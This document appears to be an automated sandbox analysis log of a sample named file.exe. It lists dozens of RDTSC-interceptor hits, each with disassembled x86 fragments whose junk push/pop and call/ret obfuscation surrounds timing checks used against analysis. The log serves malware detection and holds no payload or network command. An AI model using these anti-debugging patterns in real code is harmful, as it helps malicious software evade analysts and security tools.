Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112F188 second address: 112F1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFF112B4C16h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFF112B4C23h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112F1A9 second address: 112F1B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1169E40 second address: 1169E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1169F96 second address: 1169F9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1172075 second address: 11720B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007EFF112B4C28h 0x00000008 pop edx 0x00000009 jmp 00007EFF112B4C29h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11720B1 second address: 11720C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 je 00007EFF1080EDD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11720C1 second address: 11720C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11720C8 second address: 11720CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1172836 second address: 1172840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1172840 second address: 1172857 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE1h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1172857 second address: 1172896 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Ah 0x00000007 jmp 00007EFF112B4C28h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jo 00007EFF112B4C2Ch 0x00000015 jmp 00007EFF112B4C20h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1173BD5 second address: 1173C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 add edi, 30A48028h 0x0000000c call 00007EFF1080EDD9h 0x00000011 jl 00007EFF1080EDE4h 0x00000017 jmp 00007EFF1080EDDEh 0x0000001c push eax 0x0000001d jnl 00007EFF1080EDDEh 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push edi 0x0000002a jmp 00007EFF1080EDDFh 0x0000002f pop edi 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1173C24 second address: 1173C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007EFF112B4C1Eh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 jnl 00007EFF112B4C2Eh 0x0000001b jnp 00007EFF112B4C1Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1173D61 second address: 1173D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11740C2 second address: 11740C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11740C6 second address: 11740CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117470B second address: 1174715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007EFF112B4C16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1174715 second address: 1174728 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFF1080EDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1174A0B second address: 1174A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1174D0F second address: 1174D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1174D16 second address: 1174D1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1174D1B second address: 1174D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF1080EDDDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jnl 00007EFF1080EDD8h 0x00000014 pop eax 0x00000015 nop 0x00000016 mov dword ptr [ebp+12449E3Bh], ebx 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jp 00007EFF1080EDEDh 0x00000025 jmp 00007EFF1080EDE7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1175AC4 second address: 1175ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1175ADC second address: 1175AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1175AE0 second address: 1175B84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007EFF112B4C18h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 jp 00007EFF112B4C2Ah 0x00000028 jmp 00007EFF112B4C24h 0x0000002d mov dword ptr [ebp+122D1812h], eax 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D1DFDh], edi 0x0000003b movsx edi, di 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007EFF112B4C18h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a pushad 0x0000005b pushad 0x0000005c mov eax, 7A1CB5FEh 0x00000061 mov dx, bx 0x00000064 popad 0x00000065 jmp 00007EFF112B4C26h 0x0000006a popad 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007EFF112B4C1Ch 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176C24 second address: 1176C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF1080EDDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11780FC second address: 1178118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF112B4C22h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1177EDB second address: 1177EE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1178118 second address: 1178127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1177EE1 second address: 1177EE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1178127 second address: 1178131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFF112B4C16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D615 second address: 117D630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007EFF1080EDE0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D630 second address: 117D634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D634 second address: 117D63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D63A second address: 117D644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007EFF112B4C16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D644 second address: 117D6B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edi, dword ptr [ebp+122D3762h] 0x00000012 push 00000000h 0x00000014 call 00007EFF1080EDE4h 0x00000019 push ecx 0x0000001a mov dword ptr [ebp+122D1F52h], eax 0x00000020 pop ebx 0x00000021 pop edi 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007EFF1080EDD8h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e cld 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 jmp 00007EFF1080EDE4h 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117A16B second address: 117A18F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007EFF112B4C22h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117A18F second address: 117A193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D81B second address: 117D820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117A193 second address: 117A1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117E6F7 second address: 117E788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007EFF112B4C18h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D1FA3h], edx 0x0000002d mov dword ptr [ebp+122D281Bh], eax 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007EFF112B4C18h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f push 00000000h 0x00000051 call 00007EFF112B4C27h 0x00000056 pop edi 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push ebx 0x0000005b jmp 00007EFF112B4C1Ch 0x00000060 pop ebx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117A1A1 second address: 117A1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117A1A5 second address: 117A1B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117E8F9 second address: 117E8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117E8FE second address: 117E903 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118078B second address: 1180790 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180790 second address: 11807E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bx, F850h 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+1245C1E8h], eax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007EFF112B4C18h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 xchg eax, esi 0x00000031 jmp 00007EFF112B4C26h 0x00000036 push eax 0x00000037 push eax 0x00000038 push ecx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11808ED second address: 11808F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11808F2 second address: 118090D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c jnc 00007EFF112B4C16h 0x00000012 pop eax 0x00000013 jc 00007EFF112B4C1Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1183881 second address: 11838E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007EFF1080EDD8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 adc edi, 22F04F72h 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b mov ebx, 127C0FA4h 0x00000030 pop edi 0x00000031 push 00000000h 0x00000033 call 00007EFF1080EDE9h 0x00000038 mov ebx, 55E193CFh 0x0000003d pop edi 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 jp 00007EFF1080EDD8h 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118596E second address: 1185974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1183A83 second address: 1183A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1187276 second address: 1187293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007EFF112B4C1Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007EFF112B4C16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1186240 second address: 11862CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007EFF1080EDE6h 0x0000000c nop 0x0000000d jo 00007EFF1080EDD8h 0x00000013 mov bh, dl 0x00000015 push dword ptr fs:[00000000h] 0x0000001c pushad 0x0000001d mov dl, B5h 0x0000001f mov al, 21h 0x00000021 popad 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007EFF1080EDD8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000017h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D1806h], ecx 0x00000049 mov dword ptr [ebp+124478E0h], eax 0x0000004f mov eax, dword ptr [ebp+122D0D01h] 0x00000055 add edi, 20903C11h 0x0000005b mov dword ptr [ebp+122D1812h], esi 0x00000061 push FFFFFFFFh 0x00000063 mov ebx, dword ptr [ebp+122D193Ah] 0x00000069 and bh, FFFFFFB2h 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f je 00007EFF1080EDDCh 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11862CD second address: 11862D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11862D1 second address: 11862D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118A399 second address: 118A468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jp 00007EFF112B4C23h 0x00000011 jmp 00007EFF112B4C1Dh 0x00000016 pop esi 0x00000017 nop 0x00000018 pushad 0x00000019 jmp 00007EFF112B4C23h 0x0000001e mov edi, dword ptr [ebp+122D350Eh] 0x00000024 popad 0x00000025 mov ebx, 5E4A229Bh 0x0000002a push 00000000h 0x0000002c jng 00007EFF112B4C1Bh 0x00000032 mov ebx, 48B3E4C2h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007EFF112B4C18h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000015h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 jmp 00007EFF112B4C24h 0x00000058 xchg eax, esi 0x00000059 ja 00007EFF112B4C2Dh 0x0000005f push eax 0x00000060 jo 00007EFF112B4C37h 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007EFF112B4C25h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118850B second address: 1188515 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFF1080EDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118B303 second address: 118B307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118A607 second address: 118A611 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFF1080EDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118B4C0 second address: 118B55E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFF112B4C18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d add dword ptr [ebp+1245BCA0h], edi 0x00000013 push dword ptr fs:[00000000h] 0x0000001a jo 00007EFF112B4C1Ch 0x00000020 mov edi, dword ptr [ebp+122D34BFh] 0x00000026 pushad 0x00000027 mov si, F618h 0x0000002b mov edi, dword ptr [ebp+122D1A03h] 0x00000031 popad 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007EFF112B4C18h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 mov eax, dword ptr [ebp+122D09C1h] 0x00000059 cld 0x0000005a push FFFFFFFFh 0x0000005c push 00000000h 0x0000005e push esi 0x0000005f call 00007EFF112B4C18h 0x00000064 pop esi 0x00000065 mov dword ptr [esp+04h], esi 0x00000069 add dword ptr [esp+04h], 0000001Ah 0x00000071 inc esi 0x00000072 push esi 0x00000073 ret 0x00000074 pop esi 0x00000075 ret 0x00000076 mov dword ptr [ebp+122D342Ch], edi 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f jmp 00007EFF112B4C21h 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118B55E second address: 118B563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D0CC second address: 118D0D6 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFF112B4C1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D0D6 second address: 118D0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007EFF1080EDD6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118C42F second address: 118C434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D0E6 second address: 118D0EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118E1E7 second address: 118E1F1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFF112B4C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118E1F1 second address: 118E1F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118E1F6 second address: 118E203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11968AA second address: 11968BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF1080EDDFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11390BF second address: 11390CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF112B4C1Ah 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11390CE second address: 11390D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11390D5 second address: 11390E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11390E6 second address: 11390EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11390EC second address: 113910B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007EFF112B4C16h 0x00000009 jmp 00007EFF112B4C22h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
